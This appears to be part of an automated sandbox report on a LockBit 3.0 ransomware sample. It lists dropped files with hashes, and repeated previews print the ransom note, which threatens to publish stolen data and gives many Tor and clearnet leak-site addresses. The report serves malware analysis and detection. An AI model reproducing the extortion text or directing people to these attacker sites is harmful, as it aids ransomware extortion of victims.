browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.974154141765169
                Encrypted:false
                SSDEEP:192:r7STp1gCONwFz3obvjR+uQ9uynW84M2WcD4mo9Vft9Ak6sQ9T/Oo:rOTp1VO+dob8DghM2Wmfo9VF9QdX
                MD5:AB7213938A72500389D1DAB474F45A79
                SHA1:13E1CAEC0F480CB83463E3A144FED356700A585B
                SHA-256:D0D9EDD8CECC94DA22D16AE061C4028EC374204F6B1540797FDE07BEC9BECC89
                SHA-512:57A508657D6DAB11819B060075DEB99992D6E57937E804BAEEA064A58C18465BE0D51D28359C99AB9BD1162698E6882C0DF8A57A808398F9696E764174B388FA
                Malicious:false
                Preview:.E-..........^....[5..5........8...f..V.w'.-DK.~S]..XJ~^....t....h.\..s..E..(.p..#.B.I.K+OA.....[...m*S.E..!aP./....4!K9T...0.......\Cu.1.S.*..3n-.......H>.?...lt.(..<...>.LD'f......3...H..#}.....F.S.....a......B...<-.o.....o....6.Hb.......).!5....x....B.y....>.w%...i.YP%.......Pu...N9*M....I.._L....*..#..43...H>....N..V.l;:.n..&..o....{ u.d..`..d.Q..;0...X...kq].S.p..6......e<...s...A6..qVl=...ts>..k\..e.H.X9.sL.y.6~..m..]..).%n.^.[........F.}ld....a..y.=....o[t.3......?..B.h.m..2....oP{..H.TW?3.D....f.....b..c..3^.6.@x...K.OC.L..'.7H....YH..BN...f....jF..+;{.../..s:..9=......:....[.m.....j..i..M..!..x.g~.[........`M.4..#-`jA-.M.].._2ic.V5..uR.!.p..g....f.`...W.......u......-My]...t|@.-...O.R...B....5...t...$...H.CxZ.....O...Z...d.F.9df..!....g.Z..G......s...U..E..j.....5M..?....~.$.Jo...-...4..].T.QM8[......j{..W.z...P5......P~.g..>.X..j..5.....h.%.n.x.aKU.....i..&..k.Te"...27......iT.O.$..g.3U.+...<Q.Z..G.%....bX..l&....e.D`.....

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
